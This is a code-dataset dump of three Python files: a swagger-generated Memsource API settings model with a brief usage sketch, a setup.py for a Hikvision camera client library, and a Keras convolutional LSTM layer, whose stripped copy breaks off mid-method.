2019-09-30T14:00:03.000Z
|
2021-05-12T11:15:18.000Z
|
memsource_cli/models/lqa_settings_dto.py
|
zerodayz/memsource-cli-client
|
c2574f1467539a49e6637c874e88d75c7ef789b3
|
[
"Apache-2.0"
] | 1
|
2021-05-24T16:19:14.000Z
|
2021-05-24T16:19:14.000Z
|
# coding: utf-8
"""
Memsource REST API
Welcome to Memsource's API documentation. To view our legacy APIs please [visit our documentation](https://wiki.memsource.com/wiki/Memsource_API) and for more information about our new APIs, [visit our blog](https://www.memsource.com/blog/2017/10/24/introducing-rest-apis-qa-with-the-memsource-api-team/). If you have any questions, please contact [Memsource Support](<mailto:support@memsource.com>). # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from memsource_cli.models.lqa_error_category_dto import LqaErrorCategoryDto # noqa: F401,E501
from memsource_cli.models.lqa_severity_dto import LqaSeverityDto # noqa: F401,E501
class LqaSettingsDto(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'enabled': 'bool',
'severities': 'list[LqaSeverityDto]',
'categories': 'list[LqaErrorCategoryDto]'
}
attribute_map = {
'enabled': 'enabled',
'severities': 'severities',
'categories': 'categories'
}
def __init__(self, enabled=None, severities=None, categories=None): # noqa: E501
"""LqaSettingsDto - a model defined in Swagger""" # noqa: E501
self._enabled = None
self._severities = None
self._categories = None
self.discriminator = None
if enabled is not None:
self.enabled = enabled
if severities is not None:
self.severities = severities
if categories is not None:
self.categories = categories
@property
def enabled(self):
"""Gets the enabled of this LqaSettingsDto. # noqa: E501
:return: The enabled of this LqaSettingsDto. # noqa: E501
:rtype: bool
"""
return self._enabled
@enabled.setter
def enabled(self, enabled):
"""Sets the enabled of this LqaSettingsDto.
:param enabled: The enabled of this LqaSettingsDto. # noqa: E501
:type: bool
"""
self._enabled = enabled
@property
def severities(self):
"""Gets the severities of this LqaSettingsDto. # noqa: E501
:return: The severities of this LqaSettingsDto. # noqa: E501
:rtype: list[LqaSeverityDto]
"""
return self._severities
@severities.setter
def severities(self, severities):
"""Sets the severities of this LqaSettingsDto.
:param severities: The severities of this LqaSettingsDto. # noqa: E501
:type: list[LqaSeverityDto]
"""
self._severities = severities
@property
def categories(self):
"""Gets the categories of this LqaSettingsDto. # noqa: E501
:return: The categories of this LqaSettingsDto. # noqa: E501
:rtype: list[LqaErrorCategoryDto]
"""
return self._categories
@categories.setter
def categories(self, categories):
"""Sets the categories of this LqaSettingsDto.
:param categories: The categories of this LqaSettingsDto. # noqa: E501
:type: list[LqaErrorCategoryDto]
"""
self._categories = categories
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(LqaSettingsDto, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, LqaSettingsDto):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
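A minimal usage sketch for the generated model above; the values are invented, and in real use the severities/categories lists would carry LqaSeverityDto / LqaErrorCategoryDto instances returned by the Memsource API rather than stay empty:
from memsource_cli.models.lqa_settings_dto import LqaSettingsDto
# Construct the DTO, flip a field through its property setter, and serialize it.
settings = LqaSettingsDto(enabled=True, severities=[], categories=[])
settings.enabled = False                      # setter assigns to the private _enabled field
print(settings.to_dict())                     # {'enabled': False, 'severities': [], 'categories': []}
print(settings == LqaSettingsDto())           # False: __eq__ compares the full __dict__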
| 29.923977
| 421
| 0.601133
|
import pprint
import re
import six
from memsource_cli.models.lqa_error_category_dto import LqaErrorCategoryDto
from memsource_cli.models.lqa_severity_dto import LqaSeverityDto
class LqaSettingsDto(object):
swagger_types = {
'enabled': 'bool',
'severities': 'list[LqaSeverityDto]',
'categories': 'list[LqaErrorCategoryDto]'
}
attribute_map = {
'enabled': 'enabled',
'severities': 'severities',
'categories': 'categories'
}
def __init__(self, enabled=None, severities=None, categories=None):
self._enabled = None
self._severities = None
self._categories = None
self.discriminator = None
if enabled is not None:
self.enabled = enabled
if severities is not None:
self.severities = severities
if categories is not None:
self.categories = categories
@property
def enabled(self):
return self._enabled
@enabled.setter
def enabled(self, enabled):
self._enabled = enabled
@property
def severities(self):
return self._severities
@severities.setter
def severities(self, severities):
self._severities = severities
@property
def categories(self):
return self._categories
@categories.setter
def categories(self, categories):
self._categories = categories
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(LqaSettingsDto, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, LqaSettingsDto):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true
| true
|
1c3eba7512c64be760bcd42530a076ee253a07df
| 827
|
py
|
Python
|
setup.py
|
keshavdv/hikvision-client
|
dbebe399ea5ecbbd236488cda28242d134a9f72f
|
[
"MIT"
] | null | null | null |
setup.py
|
keshavdv/hikvision-client
|
dbebe399ea5ecbbd236488cda28242d134a9f72f
|
[
"MIT"
] | null | null | null |
setup.py
|
keshavdv/hikvision-client
|
dbebe399ea5ecbbd236488cda28242d134a9f72f
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
from os.path import join, dirname
import re
with open('hikvisionapi/__init__.py', 'r') as fd:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
fd.read(), re.MULTILINE).group(1)
setup(name='hikvisionapi',
version=version,
description='The client for HIKVISION cameras, DVR',
url='https://github.com/MissiaL/hikvision-client',
author='Petr Alekseev',
author_email='petrmissial@gmail.com',
packages=find_packages(),
long_description=open(join(dirname(__file__), 'README.md')).read(),
download_url='https://github.com/MissiaL/hikvision-client/tarball/{}'.format(version),
keywords=['api', 'hikvision', 'hikvision-client'],
install_requires=['xmltodict', 'requests', 'httpx']
)
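The setup above reads the package version out of hikvisionapi/__init__.py with a multiline regex instead of importing the package; a small self-contained sketch of that extraction (the file body below is made up for illustration) behaves like this:
import re
fake_init = 'from .client import Client\n__version__ = "0.9.2"\n'
match = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', fake_init, re.MULTILINE)
print(match.group(1))  # -> 0.9.2, the same string setup() receives as version=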
| 39.380952
| 92
| 0.650544
|
from setuptools import setup, find_packages
from os.path import join, dirname
import re
with open('hikvisionapi/__init__.py', 'r') as fd:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
fd.read(), re.MULTILINE).group(1)
setup(name='hikvisionapi',
version=version,
description='The client for HIKVISION cameras, DVR',
url='https://github.com/MissiaL/hikvision-client',
author='Petr Alekseev',
author_email='petrmissial@gmail.com',
packages=find_packages(),
long_description=open(join(dirname(__file__), 'README.md')).read(),
download_url='https://github.com/MissiaL/hikvision-client/tarball/{}'.format(version),
keywords=['api', 'hikvision', 'hikvision-client'],
install_requires=['xmltodict', 'requests', 'httpx']
)
| true
| true
|
1c3eba76465db2b8dee9184bb19fce222cfaebed
| 21,677
|
py
|
Python
|
keras/layers/convolutional_recurrent.py
|
ypxie/keras-1
|
f1ed8d63faa26ce6180faa685839aa32217211c6
|
[
"MIT"
] | 1
|
2017-11-15T14:52:07.000Z
|
2017-11-15T14:52:07.000Z
|
keras/layers/convolutional_recurrent.py
|
ypxie/keras-1
|
f1ed8d63faa26ce6180faa685839aa32217211c6
|
[
"MIT"
] | null | null | null |
keras/layers/convolutional_recurrent.py
|
ypxie/keras-1
|
f1ed8d63faa26ce6180faa685839aa32217211c6
|
[
"MIT"
] | 1
|
2021-05-01T09:39:57.000Z
|
2021-05-01T09:39:57.000Z
|
from .. import backend as K
from .. import activations, initializations, regularizers
import numpy as np
from ..engine import Layer, InputSpec
from ..utils.np_utils import conv_output_length
import warnings
class ConvRecurrent2D(Layer):
'''Abstract base class for convolutional recurrent layers.
Do not use in a model -- it's not a functional layer!
    ConvLSTM2D
    follows the specifications of this class and accepts
    the keyword arguments listed below.
# Input shape
5D tensor with shape `(nb_samples, timesteps, channels, rows, cols)`.
# Output shape
- if `return_sequences`: 5D tensor with shape
`(nb_samples, timesteps, channels, rows, cols)`.
- else, 4D tensor with shape `(nb_samples, channels, rows, cols)`.
# Arguments
weights: list of numpy arrays to set as initial weights.
The list should have 3 elements, of shapes:
`[(input_dim, nb_filter), (nb_filter, nb_filter), (nb_filter,)]`.
return_sequences: Boolean. Whether to return the last output
in the output sequence, or the full sequence.
go_backwards: Boolean (default False).
            If True, process the input sequence backwards.
stateful: Boolean (default False). If True, the last state
for each sample at index i in a batch will be used as initial
state for the sample of index i in the following batch.
nb_filter: Number of convolution filters to use.
nb_row: Number of rows in the convolution kernel.
nb_col: Number of columns in the convolution kernel.
        input_shape: shape tuple of the input; required when using this
            layer as the first layer in a model.
# Masking
This layer supports masking for input data with a variable number
of timesteps. To introduce masks to your data,
use an [Embedding](embeddings.md) layer with the `mask_zero` parameter
set to `True`.
**Note:** for the time being, masking is only supported with Theano.
# TensorFlow warning
For the time being, when using the TensorFlow backend,
the number of timesteps used must be specified in your model.
Make sure to pass an `input_length` int argument to your
recurrent layer (if it comes first in your model),
or to pass a complete `input_shape` argument to the first layer
in your model otherwise.
# Note on using statefulness in RNNs
You can set RNN layers to be 'stateful', which means that the states
computed for the samples in one batch will be reused as initial states
for the samples in the next batch.
This assumes a one-to-one mapping between
samples in different successive batches.
To enable statefulness:
- specify `stateful=True` in the layer constructor.
- specify a fixed batch size for your model, by passing
                a `batch_input_shape=(...)` to the first layer in your model.
This is the expected shape of your inputs *including the batch
size*.
It should be a tuple of integers, e.g. `(32, 10, 100)`.
To reset the states of your model, call `.reset_states()` on either
a specific layer, or on your entire model.
'''
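    # Illustrative note (not part of the original source): the statefulness recipe
    # described in the docstring above would look roughly like this in a Keras 1-style
    # model, with an invented batch size and frame shape:
    #     model.add(ConvLSTM2D(nb_filter=16, nb_row=3, nb_col=3, border_mode='same',
    #                          stateful=True, batch_input_shape=(8, 10, 40, 40, 1)))
    #     model.train_on_batch(x_batch, y_batch)   # states carry over batch to batch
    #     model.reset_states()                     # clear them between independent sequences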
def __init__(self, weights=None, nb_row=None, nb_col=None, nb_filter=None,
return_sequences=False, go_backwards=False, stateful=False,
dim_ordering=None, **kwargs):
self.return_sequences = return_sequences
self.go_backwards = go_backwards
self.stateful = stateful
self.initial_weights = weights
self.nb_row = nb_row
self.nb_col = nb_col
self.nb_filter = nb_filter
self.dim_ordering = dim_ordering
self.input_spec = [InputSpec(ndim=5)]
super(ConvRecurrent2D, self).__init__(**kwargs)
def compute_mask(self, input, mask):
if self.return_sequences:
return mask
else:
return None
def get_output_shape_for(self, input_shape):
if self.dim_ordering == 'th':
rows = input_shape[3]
cols = input_shape[4]
elif self.dim_ordering == 'tf':
rows = input_shape[2]
cols = input_shape[3]
else:
raise ValueError('Invalid dim_ordering:', self.dim_ordering)
rows = conv_output_length(rows, self.nb_row,
self.border_mode, self.subsample[0])
cols = conv_output_length(cols, self.nb_col,
self.border_mode, self.subsample[1])
if self.return_sequences:
if self.dim_ordering == 'th':
return (input_shape[0], input_shape[1],
self.nb_filter, rows, cols)
elif self.dim_ordering == 'tf':
return (input_shape[0], input_shape[1],
rows, cols, self.nb_filter)
else:
if self.dim_ordering == 'th':
return (input_shape[0], self.nb_filter, rows, cols)
elif self.dim_ordering == 'tf':
return (input_shape[0], rows, cols, self.nb_filter)
def step(self, x, states):
raise NotImplementedError
def get_constants(self, X, train=False):
return None
def get_initial_states(self, X):
# (samples, timesteps, row, col, filter)
initial_state = K.zeros_like(X)
# (samples,row, col, filter)
initial_state = K.sum(initial_state, axis=1)
initial_state = self.conv_step(initial_state, K.zeros(self.W_shape),
border_mode=self.border_mode)
initial_states = [initial_state for _ in range(2)]
return initial_states
def preprocess_input(self, x):
return x
def call(self, x, mask=None):
assert K.ndim(x) == 5
input_shape = self.input_spec[0].shape
unroll = False
if self.stateful:
initial_states = self.states
else:
initial_states = self.get_initial_states(x)
constants = self.get_constants(x)
preprocessed_input = self.preprocess_input(x)
last_output, outputs, states = K.rnn(self.step, preprocessed_input,
initial_states,
go_backwards=self.go_backwards,
mask=mask,
constants=constants,
unroll=unroll,
input_length=input_shape[1])
if self.stateful:
self.updates = []
for i in range(len(states)):
self.updates.append((self.states[i], states[i]))
if self.return_sequences:
return outputs
else:
return last_output
def get_config(self):
config = {'return_sequences': self.return_sequences,
'go_backwards': self.go_backwards,
'stateful': self.stateful}
if self.stateful:
config['batch_input_shape'] = self.input_spec[0].shape
base_config = super(ConvRecurrent2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class ConvLSTM2D(ConvRecurrent2D):
'''Convolutional LSTM.
# Input shape
- if dim_ordering='th'
5D tensor with shape:
`(samples,time, channels, rows, cols)`
- if dim_ordering='tf'
5D tensor with shape:
`(samples,time, rows, cols, channels)`
# Output shape
- if `return_sequences`
- if dim_ordering='th'
5D tensor with shape:
`(samples, time, nb_filter, output_row, output_col)`
- if dim_ordering='tf'
5D tensor with shape:
`(samples, time, output_row, output_col, nb_filter)`
- else
- if dim_ordering ='th'
4D tensor with shape:
`(samples, nb_filter, output_row, output_col)`
- if dim_ordering='tf'
4D tensor with shape:
`(samples, output_row, output_col, nb_filter)`
        where output_row and output_col depend on the shape of the filter and
the border_mode
# Arguments
nb_filter: Number of convolution filters to use.
nb_row: Number of rows in the convolution kernel.
nb_col: Number of columns in the convolution kernel.
border_mode: 'valid' or 'same'.
subsample: tuple of length 2. Factor by which to subsample output.
Also called strides elsewhere.
        dim_ordering: 'tf' if the features are on the last dimension, 'th' otherwise.
stateful : Boolean (default False). If True, the last state
for each sample at index i in a batch will be used as initial
state for the sample of index i in the following batch.
init: weight initialization function.
Can be the name of an existing function (str),
or a Theano function
(see: [initializations](../initializations.md)).
inner_init: initialization function of the inner cells.
forget_bias_init: initialization function for the bias of the
forget gate.
[Jozefowicz et al.](http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf)
recommend initializing with ones.
activation: activation function.
Can be the name of an existing function (str),
or a Theano function (see: [activations](../activations.md)).
inner_activation: activation function for the inner cells.
# References
- [Convolutional LSTM Network: A Machine Learning Approach for
Precipitation Nowcasting](http://arxiv.org/pdf/1506.04214v1.pdf)
The current implementation does not include the feedback loop on the
cells output
'''
def __init__(self, nb_filter, nb_row, nb_col,
init='glorot_uniform', inner_init='orthogonal',
forget_bias_init='one', activation='tanh',
inner_activation='hard_sigmoid',
dim_ordering='default',
border_mode='valid', subsample=(1, 1),
W_regularizer=None, U_regularizer=None, b_regularizer=None,
dropout_W=0., dropout_U=0., **kwargs):
if dim_ordering == 'default':
dim_ordering = K.image_dim_ordering()
if dim_ordering not in {'tf', 'th'}:
raise ValueError('dim_ordering must be in {tf,th}', dim_ordering)
self.nb_filter = nb_filter
self.nb_row = nb_row
self.nb_col = nb_col
self.init = initializations.get(init)
self.inner_init = initializations.get(inner_init)
self.forget_bias_init = initializations.get(forget_bias_init)
self.activation = activations.get(activation)
self.inner_activation = activations.get(inner_activation)
self.border_mode = border_mode
self.subsample = subsample
if dim_ordering == 'th':
            warnings.warn('Be careful if used with convolution3D layers:\n'
'th in convolution 3D corresponds to '
'(samples, channels, conv_dim1, conv_dim2,'
'conv_dim3)\n'
'while for this network it corresponds to: '
'(samples, time, channels, rows, cols)')
self.dim_ordering = dim_ordering
kwargs['nb_filter'] = nb_filter
kwargs['nb_row'] = nb_row
kwargs['nb_col'] = nb_col
kwargs['dim_ordering'] = dim_ordering
self.W_regularizer = regularizers.get(W_regularizer)
self.U_regularizer = regularizers.get(U_regularizer)
self.b_regularizer = regularizers.get(b_regularizer)
self.dropout_W, self.dropout_U = dropout_W, dropout_U
if self.dropout_W or self.dropout_U:
self.uses_learning_phase = True
super(ConvLSTM2D, self).__init__(**kwargs)
def build(self, input_shape):
self.input_spec = [InputSpec(shape=input_shape)]
if self.dim_ordering == 'th':
stack_size = input_shape[2]
self.W_shape = (self.nb_filter, stack_size,
self.nb_row, self.nb_col)
elif self.dim_ordering == 'tf':
stack_size = input_shape[4]
self.W_shape = (self.nb_row, self.nb_col,
stack_size, self.nb_filter)
else:
raise ValueError('Invalid dim_ordering:', self.dim_ordering)
if self.dim_ordering == 'th':
self.W_shape1 = (self.nb_filter, self.nb_filter,
self.nb_row, self.nb_col)
elif self.dim_ordering == 'tf':
self.W_shape1 = (self.nb_row, self.nb_col,
self.nb_filter, self.nb_filter)
if self.stateful:
self.reset_states()
else:
            # initial states: 2 all-zero tensors of shape (nb_filter)
self.states = [None, None, None, None]
self.W_i = self.init(self.W_shape, name='{}_W_i'.format(self.name))
self.U_i = self.inner_init(self.W_shape1,
name='{}_U_i'.format(self.name))
self.b_i = K.zeros((self.nb_filter,), name='{}_b_i'.format(self.name))
self.W_f = self.init(self.W_shape, name='{}_W_f'.format(self.name))
self.U_f = self.inner_init(self.W_shape1,
name='{}_U_f'.format(self.name))
self.b_f = self.forget_bias_init((self.nb_filter,),
name='{}_b_f'.format(self.name))
self.W_c = self.init(self.W_shape, name='{}_W_c'.format(self.name))
self.U_c = self.inner_init(self.W_shape1,
name='{}_U_c'.format(self.name))
self.b_c = K.zeros((self.nb_filter,), name='{}_b_c'.format(self.name))
self.W_o = self.init(self.W_shape, name='{}_W_o'.format(self.name))
self.U_o = self.inner_init(self.W_shape1,
name='{}_U_o'.format(self.name))
self.b_o = K.zeros((self.nb_filter,), name='{}_b_o'.format(self.name))
self.trainable_weights = [self.W_i, self.U_i, self.b_i,
self.W_c, self.U_c, self.b_c,
self.W_f, self.U_f, self.b_f,
self.W_o, self.U_o, self.b_o]
self.W = K.concatenate([self.W_i, self.W_f, self.W_c, self.W_o])
self.U = K.concatenate([self.U_i, self.U_f, self.U_c, self.U_o])
self.b = K.concatenate([self.b_i, self.b_f, self.b_c, self.b_o])
self.regularizers = []
if self.W_regularizer:
self.W_regularizer.set_param(self.W)
self.regularizers.append(self.W_regularizer)
if self.U_regularizer:
self.U_regularizer.set_param(self.U)
self.regularizers.append(self.U_regularizer)
if self.b_regularizer:
self.b_regularizer.set_param(self.b)
self.regularizers.append(self.b_regularizer)
if self.initial_weights is not None:
self.set_weights(self.initial_weights)
del self.initial_weights
self.built = True
def reset_states(self):
assert self.stateful, 'Layer must be stateful.'
input_shape = self.input_spec[0].shape
output_shape = self.get_output_shape_for(input_shape)
if not input_shape[0]:
raise ValueError('If a RNN is stateful, a complete ' +
'input_shape must be provided ' +
'(including batch size).')
if self.return_sequences:
out_row, out_col, out_filter = output_shape[2:]
else:
out_row, out_col, out_filter = output_shape[1:]
if hasattr(self, 'states'):
K.set_value(self.states[0],
np.zeros((input_shape[0],
out_row, out_col, out_filter)))
K.set_value(self.states[1],
np.zeros((input_shape[0],
out_row, out_col, out_filter)))
else:
self.states = [K.zeros((input_shape[0],
out_row, out_col, out_filter)),
K.zeros((input_shape[0],
out_row, out_col, out_filter))]
def conv_step(self, x, W, b=None, border_mode='valid'):
input_shape = self.input_spec[0].shape
conv_out = K.conv2d(x, W, strides=self.subsample,
border_mode=border_mode,
dim_ordering=self.dim_ordering,
image_shape=(input_shape[0],
input_shape[2],
input_shape[3],
input_shape[4]),
filter_shape=self.W_shape)
if b:
if self.dim_ordering == 'th':
conv_out = conv_out + K.reshape(b, (1, self.nb_filter, 1, 1))
elif self.dim_ordering == 'tf':
conv_out = conv_out + K.reshape(b, (1, 1, 1, self.nb_filter))
else:
raise ValueError('Invalid dim_ordering:', self.dim_ordering)
return conv_out
def conv_step_hidden(self, x, W, border_mode='valid'):
# This new function was defined because the
# image shape must be hardcoded
input_shape = self.input_spec[0].shape
output_shape = self.get_output_shape_for(input_shape)
if self.return_sequences:
out_row, out_col, out_filter = output_shape[2:]
else:
out_row, out_col, out_filter = output_shape[1:]
conv_out = K.conv2d(x, W, strides=(1, 1),
border_mode=border_mode,
dim_ordering=self.dim_ordering,
image_shape=(input_shape[0],
out_row, out_col,
out_filter),
filter_shape=self.W_shape1)
return conv_out
def step(self, x, states):
assert len(states) == 4
h_tm1 = states[0]
c_tm1 = states[1]
B_U = states[2]
B_W = states[3]
x_i = self.conv_step(x * B_W[0], self.W_i, self.b_i,
border_mode=self.border_mode)
x_f = self.conv_step(x * B_W[1], self.W_f, self.b_f,
border_mode=self.border_mode)
x_c = self.conv_step(x * B_W[2], self.W_c, self.b_c,
border_mode=self.border_mode)
x_o = self.conv_step(x * B_W[3], self.W_o, self.b_o,
border_mode=self.border_mode)
# U : from nb_filter to nb_filter
# Same because must be stable in the output space
h_i = self.conv_step_hidden(h_tm1 * B_U[0], self.U_i,
border_mode='same')
h_f = self.conv_step_hidden(h_tm1 * B_U[1], self.U_f,
border_mode='same')
h_c = self.conv_step_hidden(h_tm1 * B_U[2], self.U_c,
border_mode='same')
h_o = self.conv_step_hidden(h_tm1 * B_U[3], self.U_o,
border_mode='same')
i = self.inner_activation(x_i + h_i)
f = self.inner_activation(x_f + h_f)
c = f * c_tm1 + i * self.activation(x_c + h_c)
o = self.inner_activation(x_o + h_o)
h = o * self.activation(c)
return h, [h, c]
def get_constants(self, x):
constants = []
if 0 < self.dropout_U < 1:
ones = K.zeros_like(x)
ones = K.sum(ones, axis=1)
ones = self.conv_step(ones, K.zeros(self.W_shape),
border_mode=self.border_mode)
ones = ones + 1
B_U = [K.in_train_phase(K.dropout(ones, self.dropout_U), ones)
for _ in range(4)]
constants.append(B_U)
else:
constants.append([K.cast_to_floatx(1.) for _ in range(4)])
if 0 < self.dropout_W < 1:
ones = K.zeros_like(x)
ones = K.sum(ones, axis=1)
ones = ones + 1
B_W = [K.in_train_phase(K.dropout(ones, self.dropout_W), ones)
for _ in range(4)]
constants.append(B_W)
else:
constants.append([K.cast_to_floatx(1.) for _ in range(4)])
return constants
def get_config(self):
config = {'nb_filter': self.nb_filter,
'nb_row': self.nb_row,
'nb_col': self.nb_col,
'init': self.init.__name__,
'inner_init': self.inner_init.__name__,
'forget_bias_init': self.forget_bias_init.__name__,
'activation': self.activation.__name__,
'dim_ordering': self.dim_ordering,
'border_mode': self.border_mode,
'inner_activation': self.inner_activation.__name__}
base_config = super(ConvLSTM2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
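A minimal sketch of wiring the layer above into a Keras 1-style model, assuming the 'tf' dim_ordering (samples, time, rows, cols, channels); the filter count, frame shape, and import path are illustrative assumptions and have not been verified against this exact fork:
from keras.models import Sequential
from keras.layers.convolutional_recurrent import ConvLSTM2D
model = Sequential()
# 10 frames of 40x40 single-channel input; 'same' padding keeps the spatial size
model.add(ConvLSTM2D(nb_filter=16, nb_row=3, nb_col=3,
                     border_mode='same', return_sequences=True,
                     dim_ordering='tf', input_shape=(10, 40, 40, 1)))
model.compile(optimizer='adadelta', loss='mse')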
| 42.420744
| 96
| 0.564562
|
from .. import backend as K
from .. import activations, initializations, regularizers
import numpy as np
from ..engine import Layer, InputSpec
from ..utils.np_utils import conv_output_length
import warnings
class ConvRecurrent2D(Layer):
def __init__(self, weights=None, nb_row=None, nb_col=None, nb_filter=None,
return_sequences=False, go_backwards=False, stateful=False,
dim_ordering=None, **kwargs):
self.return_sequences = return_sequences
self.go_backwards = go_backwards
self.stateful = stateful
self.initial_weights = weights
self.nb_row = nb_row
self.nb_col = nb_col
self.nb_filter = nb_filter
self.dim_ordering = dim_ordering
self.input_spec = [InputSpec(ndim=5)]
super(ConvRecurrent2D, self).__init__(**kwargs)
def compute_mask(self, input, mask):
if self.return_sequences:
return mask
else:
return None
def get_output_shape_for(self, input_shape):
if self.dim_ordering == 'th':
rows = input_shape[3]
cols = input_shape[4]
elif self.dim_ordering == 'tf':
rows = input_shape[2]
cols = input_shape[3]
else:
raise ValueError('Invalid dim_ordering:', self.dim_ordering)
rows = conv_output_length(rows, self.nb_row,
self.border_mode, self.subsample[0])
cols = conv_output_length(cols, self.nb_col,
self.border_mode, self.subsample[1])
if self.return_sequences:
if self.dim_ordering == 'th':
return (input_shape[0], input_shape[1],
self.nb_filter, rows, cols)
elif self.dim_ordering == 'tf':
return (input_shape[0], input_shape[1],
rows, cols, self.nb_filter)
else:
if self.dim_ordering == 'th':
return (input_shape[0], self.nb_filter, rows, cols)
elif self.dim_ordering == 'tf':
return (input_shape[0], rows, cols, self.nb_filter)
def step(self, x, states):
raise NotImplementedError
def get_constants(self, X, train=False):
return None
def get_initial_states(self, X):
initial_state = K.zeros_like(X)
initial_state = K.sum(initial_state, axis=1)
initial_state = self.conv_step(initial_state, K.zeros(self.W_shape),
border_mode=self.border_mode)
initial_states = [initial_state for _ in range(2)]
return initial_states
def preprocess_input(self, x):
return x
def call(self, x, mask=None):
assert K.ndim(x) == 5
input_shape = self.input_spec[0].shape
unroll = False
if self.stateful:
initial_states = self.states
else:
initial_states = self.get_initial_states(x)
constants = self.get_constants(x)
preprocessed_input = self.preprocess_input(x)
last_output, outputs, states = K.rnn(self.step, preprocessed_input,
initial_states,
go_backwards=self.go_backwards,
mask=mask,
constants=constants,
unroll=unroll,
input_length=input_shape[1])
if self.stateful:
self.updates = []
for i in range(len(states)):
self.updates.append((self.states[i], states[i]))
if self.return_sequences:
return outputs
else:
return last_output
def get_config(self):
config = {'return_sequences': self.return_sequences,
'go_backwards': self.go_backwards,
'stateful': self.stateful}
if self.stateful:
config['batch_input_shape'] = self.input_spec[0].shape
base_config = super(ConvRecurrent2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class ConvLSTM2D(ConvRecurrent2D):
def __init__(self, nb_filter, nb_row, nb_col,
init='glorot_uniform', inner_init='orthogonal',
forget_bias_init='one', activation='tanh',
inner_activation='hard_sigmoid',
dim_ordering='default',
border_mode='valid', subsample=(1, 1),
W_regularizer=None, U_regularizer=None, b_regularizer=None,
dropout_W=0., dropout_U=0., **kwargs):
if dim_ordering == 'default':
dim_ordering = K.image_dim_ordering()
if dim_ordering not in {'tf', 'th'}:
raise ValueError('dim_ordering must be in {tf,th}', dim_ordering)
self.nb_filter = nb_filter
self.nb_row = nb_row
self.nb_col = nb_col
self.init = initializations.get(init)
self.inner_init = initializations.get(inner_init)
self.forget_bias_init = initializations.get(forget_bias_init)
self.activation = activations.get(activation)
self.inner_activation = activations.get(inner_activation)
self.border_mode = border_mode
self.subsample = subsample
if dim_ordering == 'th':
            warnings.warn('Be careful if used with convolution3D layers:\n'
'th in convolution 3D corresponds to '
'(samples, channels, conv_dim1, conv_dim2,'
'conv_dim3)\n'
'while for this network it corresponds to: '
'(samples, time, channels, rows, cols)')
self.dim_ordering = dim_ordering
kwargs['nb_filter'] = nb_filter
kwargs['nb_row'] = nb_row
kwargs['nb_col'] = nb_col
kwargs['dim_ordering'] = dim_ordering
self.W_regularizer = regularizers.get(W_regularizer)
self.U_regularizer = regularizers.get(U_regularizer)
self.b_regularizer = regularizers.get(b_regularizer)
self.dropout_W, self.dropout_U = dropout_W, dropout_U
if self.dropout_W or self.dropout_U:
self.uses_learning_phase = True
super(ConvLSTM2D, self).__init__(**kwargs)
def build(self, input_shape):
self.input_spec = [InputSpec(shape=input_shape)]
if self.dim_ordering == 'th':
stack_size = input_shape[2]
self.W_shape = (self.nb_filter, stack_size,
self.nb_row, self.nb_col)
elif self.dim_ordering == 'tf':
stack_size = input_shape[4]
self.W_shape = (self.nb_row, self.nb_col,
stack_size, self.nb_filter)
else:
raise ValueError('Invalid dim_ordering:', self.dim_ordering)
if self.dim_ordering == 'th':
self.W_shape1 = (self.nb_filter, self.nb_filter,
self.nb_row, self.nb_col)
elif self.dim_ordering == 'tf':
self.W_shape1 = (self.nb_row, self.nb_col,
self.nb_filter, self.nb_filter)
if self.stateful:
self.reset_states()
else:
self.states = [None, None, None, None]
self.W_i = self.init(self.W_shape, name='{}_W_i'.format(self.name))
self.U_i = self.inner_init(self.W_shape1,
name='{}_U_i'.format(self.name))
self.b_i = K.zeros((self.nb_filter,), name='{}_b_i'.format(self.name))
self.W_f = self.init(self.W_shape, name='{}_W_f'.format(self.name))
self.U_f = self.inner_init(self.W_shape1,
name='{}_U_f'.format(self.name))
self.b_f = self.forget_bias_init((self.nb_filter,),
name='{}_b_f'.format(self.name))
self.W_c = self.init(self.W_shape, name='{}_W_c'.format(self.name))
self.U_c = self.inner_init(self.W_shape1,
name='{}_U_c'.format(self.name))
self.b_c = K.zeros((self.nb_filter,), name='{}_b_c'.format(self.name))
self.W_o = self.init(self.W_shape, name='{}_W_o'.format(self.name))
self.U_o = self.inner_init(self.W_shape1,
name='{}_U_o'.format(self.name))
self.b_o = K.zeros((self.nb_filter,), name='{}_b_o'.format(self.name))
self.trainable_weights = [self.W_i, self.U_i, self.b_i,
self.W_c, self.U_c, self.b_c,
